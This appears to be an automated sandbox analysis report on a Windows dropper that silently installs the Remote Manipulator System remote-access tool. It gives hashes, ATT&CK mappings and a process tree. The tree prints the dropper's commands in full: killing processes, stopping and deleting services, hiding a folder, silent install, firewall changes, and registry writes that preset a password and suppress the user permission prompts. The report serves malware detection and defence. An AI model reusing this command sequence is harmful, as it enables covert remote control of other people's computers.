rms | cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2022, 04:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Size

3.3MB
MD5

3034a42900fbface754e83567cb1e8b8
SHA1

6538da3b999db0894615130fd300a4f2c225c108
SHA256

cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
SHA512

28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
SSDEEP

98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH

Score

10^/10

rms evasion rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Executes dropped EXE 9 IoCs

pid	Process
652	7z.exe
800	ses.exe
5036	rutserv.exe
1656	rutserv.exe
4220	rutserv.exe
512	rutserv.exe
3552	rfusclient.exe
4064	rfusclient.exe
1684	rfusclient.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
3704	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ses.exe

Loads dropped DLL 1 IoCs

pid	Process
652	7z.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe

Drops file in Windows directory 31 IoCs

description	ioc	Process
File created	C:\Windows\spom\0d502779-c529-4ae0-a0cb-e70926e21349.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI4F4B.txt	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_191538705.html	cmd.exe
File created	C:\Windows\spom\ses.exe	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File created	C:\Windows\spom\wctC61E.tmp	cmd.exe
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI4F4B.txt	cmd.exe
File created	C:\Windows\spom\GBQHURCC-20220812-1921.log	cmd.exe
File created	C:\Windows\spom\wct4E2A.tmp	cmd.exe
File created	C:\Windows\spom\514c4da3-c1a5-46c5-8d2b-306ae49d7593.tmp	cmd.exe
File created	C:\Windows\spom\aria-debug-4640.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI4F1D.txt	cmd.exe
File created	C:\Windows\spom\GBQHURCC-20220812-1921a.log	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\wct1510.tmp	cmd.exe
File created	C:\Windows\spom\wct8E36.tmp	cmd.exe
File created	C:\Windows\spom\684259a6-0175-4108-a860-699cb31f63c2.tmp	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\a6b75105-7dc9-45ac-b70c-19519ab6d538.tmp	cmd.exe
File created	C:\Windows\spom\adc52f94-c82e-434e-9f30-9b348375f053.tmp	cmd.exe
File created	C:\Windows\spom\AdobeSFX.log	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\wct399A.tmp	cmd.exe
File created	C:\Windows\spom\BroadcastMsg_1660332030.txt	cmd.exe
File created	C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	cmd.exe
File created	C:\Windows\spom\msedge_installer.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI4F1D.txt	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3624	sc.exe
1048	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 2 IoCs

evasion

pid	Process
4264	taskkill.exe
952	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
5036	rutserv.exe
5036	rutserv.exe
5036	rutserv.exe
5036	rutserv.exe
5036	rutserv.exe
5036	rutserv.exe
1656	rutserv.exe
1656	rutserv.exe
4220	rutserv.exe
4220	rutserv.exe
512	rutserv.exe
512	rutserv.exe
512	rutserv.exe
512	rutserv.exe
512	rutserv.exe
512	rutserv.exe
3552	rfusclient.exe
3552	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1684	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	952	taskkill.exe
Token: SeDebugPrivilege	5036	rutserv.exe
Token: SeDebugPrivilege	4220	rutserv.exe
Token: SeTakeOwnershipPrivilege	512	rutserv.exe
Token: SeTcbPrivilege	512	rutserv.exe
Token: SeTcbPrivilege	512	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4656 wrote to memory of 4116	4656	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	80
PID 4656 wrote to memory of 4116	4656	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	80
PID 4656 wrote to memory of 4116	4656	cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe	80
PID 4116 wrote to memory of 652	4116	cmd.exe	83
PID 4116 wrote to memory of 652	4116	cmd.exe	83
PID 4116 wrote to memory of 652	4116	cmd.exe	83
PID 4116 wrote to memory of 800	4116	cmd.exe	84
PID 4116 wrote to memory of 800	4116	cmd.exe	84
PID 4116 wrote to memory of 800	4116	cmd.exe	84
PID 800 wrote to memory of 5116	800	ses.exe	85
PID 800 wrote to memory of 5116	800	ses.exe	85
PID 800 wrote to memory of 5116	800	ses.exe	85
PID 5116 wrote to memory of 4264	5116	cmd.exe	87
PID 5116 wrote to memory of 4264	5116	cmd.exe	87
PID 5116 wrote to memory of 4264	5116	cmd.exe	87
PID 5116 wrote to memory of 952	5116	cmd.exe	88
PID 5116 wrote to memory of 952	5116	cmd.exe	88
PID 5116 wrote to memory of 952	5116	cmd.exe	88
PID 5116 wrote to memory of 4988	5116	cmd.exe	89
PID 5116 wrote to memory of 4988	5116	cmd.exe	89
PID 5116 wrote to memory of 4988	5116	cmd.exe	89
PID 4988 wrote to memory of 5092	4988	net.exe	90
PID 4988 wrote to memory of 5092	4988	net.exe	90
PID 4988 wrote to memory of 5092	4988	net.exe	90
PID 5116 wrote to memory of 3764	5116	cmd.exe	91
PID 5116 wrote to memory of 3764	5116	cmd.exe	91
PID 5116 wrote to memory of 3764	5116	cmd.exe	91
PID 3764 wrote to memory of 4092	3764	net.exe	92
PID 3764 wrote to memory of 4092	3764	net.exe	92
PID 3764 wrote to memory of 4092	3764	net.exe	92
PID 5116 wrote to memory of 3624	5116	cmd.exe	93
PID 5116 wrote to memory of 3624	5116	cmd.exe	93
PID 5116 wrote to memory of 3624	5116	cmd.exe	93
PID 5116 wrote to memory of 1048	5116	cmd.exe	94
PID 5116 wrote to memory of 1048	5116	cmd.exe	94
PID 5116 wrote to memory of 1048	5116	cmd.exe	94
PID 5116 wrote to memory of 4840	5116	cmd.exe	95
PID 5116 wrote to memory of 4840	5116	cmd.exe	95
PID 5116 wrote to memory of 4840	5116	cmd.exe	95
PID 5116 wrote to memory of 3704	5116	cmd.exe	96
PID 5116 wrote to memory of 3704	5116	cmd.exe	96
PID 5116 wrote to memory of 3704	5116	cmd.exe	96
PID 5116 wrote to memory of 5036	5116	cmd.exe	97
PID 5116 wrote to memory of 5036	5116	cmd.exe	97
PID 5116 wrote to memory of 5036	5116	cmd.exe	97
PID 5116 wrote to memory of 1656	5116	cmd.exe	98
PID 5116 wrote to memory of 1656	5116	cmd.exe	98
PID 5116 wrote to memory of 1656	5116	cmd.exe	98
PID 5116 wrote to memory of 3684	5116	cmd.exe	99
PID 5116 wrote to memory of 3684	5116	cmd.exe	99
PID 5116 wrote to memory of 3684	5116	cmd.exe	99
PID 5116 wrote to memory of 4824	5116	cmd.exe	100
PID 5116 wrote to memory of 4824	5116	cmd.exe	100
PID 5116 wrote to memory of 4824	5116	cmd.exe	100
PID 5116 wrote to memory of 4996	5116	cmd.exe	101
PID 5116 wrote to memory of 4996	5116	cmd.exe	101
PID 5116 wrote to memory of 4996	5116	cmd.exe	101
PID 5116 wrote to memory of 4748	5116	cmd.exe	102
PID 5116 wrote to memory of 4748	5116	cmd.exe	102
PID 5116 wrote to memory of 4748	5116	cmd.exe	102
PID 5116 wrote to memory of 3364	5116	cmd.exe	103
PID 5116 wrote to memory of 3364	5116	cmd.exe	103
PID 5116 wrote to memory of 3364	5116	cmd.exe	103
PID 5116 wrote to memory of 3048	5116	cmd.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3704	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
"C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.bat" "
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe
    7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:652
- - C:\Users\Admin\AppData\Local\Temp\ses.exe
    "C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.bat" -p "
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:5116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rfusclient.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im rutserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:952
    - - C:\Windows\SysWOW64\net.exe
        
        net stop netaservice
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4988
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop netaservice
        6⤵
        
        PID:5092
    - - C:\Windows\SysWOW64\net.exe
        
        net stop rmanservice
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3764
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop rmanservice
        6⤵
        
        PID:4092
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete netaservice
        5⤵
        Launches sc.exe
        
        PID:3624
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete rmanservice
        5⤵
        Launches sc.exe
        
        PID:1048
    - - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        5⤵
        
        PID:4840
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Windows\spom"
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3704
    - - C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
    - - C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1656
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0070006c0075007400750073003100320033004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00420044003600330046003600340038002d0043004300360043002d0034004200430033002d0041003100390046002d003800420041004400450045004200300030003700390033007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00350036003000300036003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
        5⤵
        
        PID:3684
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
        5⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003500360030003000360022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
        5⤵
        
        PID:4748
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736509055369644964061034313936322e37343233343034353134084c6963656e73657306ae524d532d462d31393738444135303863433339363536326343663341363644613832323265446269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c465644676f424167526c645738645556554f446c5246446d463966674d494841494341514a76593370704167304c4177734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223536303036223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
        5⤵
        
        PID:3364
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
        5⤵
        
        PID:3048
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003500360030003000360022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
        5⤵
        
        PID:4424
    - - C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        
        "rutserv.exe" /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4220

C:\Users\Admin\AppData\Local\Temp\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:512
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:4064
- C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3552
- - C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
    C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.dll

Filesize
893KB

MD5
04ad4b80880b32c94be8d0886482c774

SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0

SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338

SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\7z.exe

Filesize
160KB

MD5
a51d90f2f9394f5ea0a3acae3bd2b219

SHA1
20fea1314dbed552d5fedee096e2050369172ee1

SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f

SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\Sys.7z

Filesize
2.2MB

MD5
be88b8b3ce26e220162b65029b3f0b38

SHA1
468389733444173e91f2ac208d500deed637a241

SHA256
502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5

SHA512
36f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BEB.tmp\new.bat

Filesize
65B

MD5
13310849fd8d70c608fd7b02fa86eea5

SHA1
9e79bc5cc474fefbe6ec40f8403ba74bb271f393

SHA256
03d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42

SHA512
909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30

Download Submit
C:\Users\Admin\AppData\Local\Temp\83CB.tmp\15971.bat

Filesize
10KB

MD5
64736420a3b8c3061f89d2bdac26465c

SHA1
306f8e23b6c979e863cca7f238dd229543e40b35

SHA256
ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119

SHA512
9983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
4.8MB

MD5
71abd0cadb18ddcb92a4dc990a29824b

SHA1
d640ecac5ef9db4a642357a5b187c778798a9459

SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605

SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a

Download Submit
